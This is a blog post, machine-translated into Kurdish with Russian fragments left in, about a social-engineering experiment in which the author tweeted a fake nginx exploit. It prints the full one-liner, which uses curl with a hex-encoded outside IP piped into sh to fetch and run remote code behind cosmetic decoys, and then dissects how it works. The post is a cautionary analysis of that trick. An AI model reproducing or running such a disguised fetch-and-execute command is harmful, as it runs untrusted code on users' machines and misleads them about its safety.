ProHoster > Blog > Rêveberî > Serkeftina ceribandinek civakî ya bi îstismarek sexte ji bo nginx

Serkeftina ceribandinek civakî ya bi îstismarek sexte ji bo nginx

Not. werger.: nivîskar nota orîjînal, ku di 1ê Hezîranê de hate weşandin, biryar da ku di nav kesên ku bi ewlehiya agahdariyê re eleqedar dibin de ceribandinek bike. Ji bo vê yekê, wî ji bo qelsiyek nenaskirî ya di servera malperê de îstîsmarek sexte amade kir û li ser Twittera xwe şand. Texmînên wî - ku tavilê ji hêla pisporên ku dê xapandina eşkere ya di kodê de bibînin - were eşkere kirin - ne tenê ne rast derketin ... Ew ji hemî hêviyên xwe derbas kirin, û berevajî vê yekê: tweet piştgirîyek mezin ji gelek kesên ku nedîtin stend. naveroka wê kontrol bikin.

Serkeftina ceribandinek civakî ya bi îstismarek sexte ji bo nginx

TL;DR: Di bin tu şert û mercan de pîvazkirina pelan li sh an bash bikar neynin. Ev rêgezek girîng e ku meriv kontrola komputera xwe winda bike.

Ez dixwazim bi we re kurteçîrokek li ser îstîsmarek PoC ya komîk a ku di 31ê Gulanê de hate afirandin bi we re parve bikim. Он появился оперативно в ответ на новость от Alisa Esage Shevchenko, endam Initnsiyatîfa Roja Zero (ZDI), ew agahdarî di derbarê qelsiyek di NGINX de ku dibe sedema RCE (îcrakirina koda dûr) dê di demek nêzîk de were eşkere kirin. Ji ber ku NGINX gelek malperan hêzdar dike, pêdivî ye ku nûçe bibe bombeyek. Lê ji ber dereng di pêvajoya "aşkerekirina berpirsiyar" de, hûrguliyên tiştê ku qewimî nehat zanîn - ev prosedurek standard ZDI ye.

Serkeftina ceribandinek civakî ya bi îstismarek sexte ji bo nginx
Tweet di derbarê eşkerekirina xirapbûnê de li NGINX

Piştî ku min xebata li ser teknîkek nû ya berbelavkirinê di curl de qedand, min tweeta orîjînal vegot û "PoCek xebitî" ya ku ji yek rêzek kodê pêk tê ku qaşo qelsiya keşifkirî îstîsmar dike, derxist. Bê guman, ev bi tevahî bêaqil bû. Min texmîn kir ku ez ê tavilê eşkere bibim, û ya herî baş ez ê çend retweetan bistînim (oh baş).

Serkeftina ceribandinek civakî ya bi îstismarek sexte ji bo nginx
Tweet bi îstismareke sexte

Lêbelê, min nikarî xeyal bikim ku paşê çi bû. Popularîteya tweeta min pir zêde bû. Ecêb e, di vê gavê de (15:00 bi dema Moskowê 1ê Hezîranê) hindik kesan fêm kir ku ev derewîn e. Pir kes bêyî kontrolkirina wê ji nû ve tweet dikin (bihêlin ku heyranê grafîkên ASCII yên delal ên ku ew derdixe).

Serkeftina ceribandinek civakî ya bi îstismarek sexte ji bo nginx
Tenê binêrin ka ew çiqas xweşik e!

Digel ku hemî van lûf û reng pir mezin in, diyar e ku mirov neçar bû ku kodê li ser makîneya xwe bimeşînin da ku wan bibînin. Xwezî, gerok bi heman rengî dixebitin, û digel vê yekê ku min bi rastî nexwest têkevim tengasiyek qanûnî, koda ku di malpera min de hatî veşartin tenê bangên echo dikir bêyî ku hewl bide ku kodek zêde saz bike an bicîh bike.

Danûstandinek piçûk: netspooky, dnz, ez û xortên din ên tîmê Thugcrowd Ev demek e em bi awayên cihêreng dilîzin da ku emrên curl-ê bişewitînin ji ber ku ew xweş e... û em gewre ne. netspooky û dnz gelek rêbazên nû kifş kirin ku ji min re pir sozdar xuya bûn. Ez tevlî şahiyê bûm û min hewl da ku veguheztinên dehan yên IP-yê li çenteyê hîleyan zêde bikim. Derket holê ku IP di heman demê de dikare di forma hexadecimal de jî were veguheztin. Wekî din, curl û piraniya amûrên din ên NIX bi kêfxweşî IP-yên hexadecimal dixwin! Ji ber vê yekê ew tenê bû ku meriv rêzek fermanê ya qanih û ewledar were afirandin. В конечном итоге я остановился на этой:

curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost

Endezyariya sosyo-elektronîkî (SEE) - ji tenê phishing wêdetir

Ewlehî û nasîn beşek sereke ya vê ceribandinê bû. Думаю, именно они привели к его успеху. Xeta fermanê bi zelalî bi referansa "127.0.0.1" (hostê herêmî yê naskirî) ewlehiyê vedibêje. Localhost ewledar tê hesibandin û daneyên li ser wê qet ji komputera we dernakeve.

Nasname duyemîn pêkhateya sereke ya SEE ya ceribandinê bû. Ji ber ku temaşevanên armanc di serî de ji kesên ku bi bingehên ewlehiya komputerê nas dikin pêk dihat, girîng bû ku kod were afirandin da ku beşên wê nas û nas xuya bikin (û ji ber vê yekê ewledar). Deynkirina hêmanên têgînên îstîsmarê yên kevin û berhevkirina wan bi rengekî neasayî gelek serketî ye.

Li jêr analîzek hûrgulî ya yek-liner e. Her tişt li ser vê navnîşê li xwe dike xwezaya kozmetîkî, û bi pratîkî tiştek ji bo xebata wê ya rastîn hewce nake.

Çi hêmanên bi rastî hewce ne? Ev -gsS, -O 0x0238f06a, |sh и сам веб-сервер. Pêşkêşkara malperê ti rêwerzên xerab tune, lê bi tenê grafikên ASCII bi karanîna fermanan re xizmet kir echo di senaryoya ku tê de heye index.html. Dema ku bikarhêner ketin rêzek bi |sh di navîn de, index.html barkirin û kirin. Xweşbextane, parêzgerên servera malperê niyeta nexweş tune bûn.

  • ../../../%00 - nîşan dide ku ji pelrêçê wêdetir diçin;
  • ngx_stream_module.so - riya berbi modulek NGINX-a rasthatî;
  • /bin/sh%00<'protocol:TCP' - Qaşo em dest pê dikin /bin/sh li ser makîneya armancê û beralîkirina encam berbi kanala TCP;
  • -O 0x0238f06a#PLToffset - malzemeya veşartî, pêvekirî #PLToffset, ji bo ku di PLT-ê de bi rengek hûrgelek bîranînê xuya bike;
  • |sh; — еще один важный фрагмент. Ji bo ku em koda ku ji servera malperê ya êrîşkar a ku li cîhê ye, bicîh bikin, hewce bû ku em derketinê ber bi sh/bash ve rêve bikin. 0x0238f06a (2.56.240.x);
  • nc /dev/tcp/localhost - dummyek ku tê de netcat behs dike /dev/tcp/localhostda ku her tişt dîsa ewle xuya dike. Di rastiyê de, ew tiştek nake û ji bo bedewiyê di rêzê de ye.

Ev yek deşîfrekirina skrîpta yek-xêz û nîqaşa aliyên "endezyariya sosyo-elektronîkî" (phishing tevlihev) bi dawî dike.

Veavakirina Pêşkêşkara Webê û tedbîrên dijber

Ji ber ku piraniya aboneyên min infosec/hacker in, min biryar da ku ez servera malperê li hember îfadeyên "berjewendiyê" yên ji hêla wan ve hinekî berxwedêrtir bikim, tenê ji bo ku mêran tiştekî bikin (û ew ê xweş be damezirandin). Ez ê li vir hemî xeletiyan navnîş nekim ji ber ku ceribandin hîn jî berdewam e, lê li vir çend tişt hene ku server dike:

  • Bi aktîvî hewildanên belavkirinê yên li ser hin torên civakî dişopîne û piçûkên pêşdîtinê yên cihêreng diguhezîne da ku bikarhêner teşwîq bike ku li ser zencîreyê bitikîne.
  • Chrome/Mozilla/Safari/hwd li şûna ku skrîpta şêlê nîşan bide, beralî dike vîdyoya danasînê ya Thugcrowd.
  • Li nîşanên EWŞYAR ên destdirêjî/hakkirina eşkere temaşe dike, û dûv re dest bi veguheztina daxwazan ber bi serverên NSA (ha!) dike.
  • Trojanek û her weha rootkitek BIOS-ê li ser hemî komputerên ku bikarhênerên wan ji gerokek birêkûpêk serdana mêvandar dikin saz dike (tenê henek dike!).

Serkeftina ceribandinek civakî ya bi îstismarek sexte ji bo nginx
Parçeyek piçûk a antîmeran

Di vê rewşê de, mebesta min tenê ew bû ku ez hin taybetmendiyên Apache-ê - nemaze, qaîdeyên xweş ên ji bo veguheztina daxwazan serdest bikim - û ez fikirîm: çima na?

NGINX Exploit (Rast!)

Bibin abone @alisaesage li ser Twitter-ê û xebata mezin a ZDI-yê di çareserkirina qelsiyên pir rastîn de bişopînin û di NGINX de îmkanan bikar bînin. Karê wan her gav ez dilşad kirim û ez ji Alice re spas dikim ji bo sebira wê digel hemî behs û agahdarîyên ku tweeta min a bêaqil kir. Bi bextewarî, wê hin baş jî kir: ew alîkariya zêdekirina hişmendiya lawaziyên NGINX, û her weha pirsgirêkên ku ji ber destdirêjiya curl çêdibin, kir.

Source: www.habr.com

Add a comment